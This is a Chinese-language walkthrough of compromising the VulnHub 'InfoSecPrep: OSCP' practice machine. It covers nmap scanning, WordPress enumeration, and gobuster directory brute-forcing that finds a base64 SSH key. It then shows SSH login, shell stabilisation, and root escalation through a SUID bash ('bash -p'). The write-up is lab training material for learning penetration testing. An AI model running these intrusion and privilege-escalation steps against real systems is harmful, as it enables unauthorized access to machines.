"满地都是六便士,他却抬头看见了月亮"
项目地址:
https://download.vulnhub.com/infosecprep/oscp.zip
本靶机比较适合新手
0x00.主机探测
sudo nmap -sP 192.168.33.1/24
确定目标IP为:192.168.33.131
0x01.端口服务探测:
sudo nmap -sC -sV 192.168.33.131 -oN oscp.nmap
0x02.访问80端口:
一个很经典的WordPress页面
当然最重要的信息是only user for the box is “oscp”
这里有两种可能:
1.指wordpress后台账户只有oscp,
2.是这台靶机系统上只有ROOT和OSCP这两个用户
是一个 WordPress 的 cms ,
#看下是什么版本的
cmseek -u http://192.168.33.131
0x03.目录遍历:
sudo gobuster dir -u http://192.168.33.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium
http://192.168.33.131/secret.tx
Base64解密:发现是SSH密钥
0x04.直接SSH链接:
ssh -i id_rsa oscp@192.168.33.131
0x05.提权:先拿一个完整的shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
ctrl + z
stty -a stty raw -echo;fg
reset
stty rows x columns y
这个靶机不能使用这个,提权要用到现在通过 python 拿一个完整的 shell 就不行了.
guid =s 提权
find / -perm -u=s -type f 2>/dev/null
/usr/bin/bash -p
whoami
0x06.提权成功:
参考资料:
https://blog.csdn.net/qq_44635376/article/details/113679933
https://www.cnblogs.com/takagisan/p/16253546.html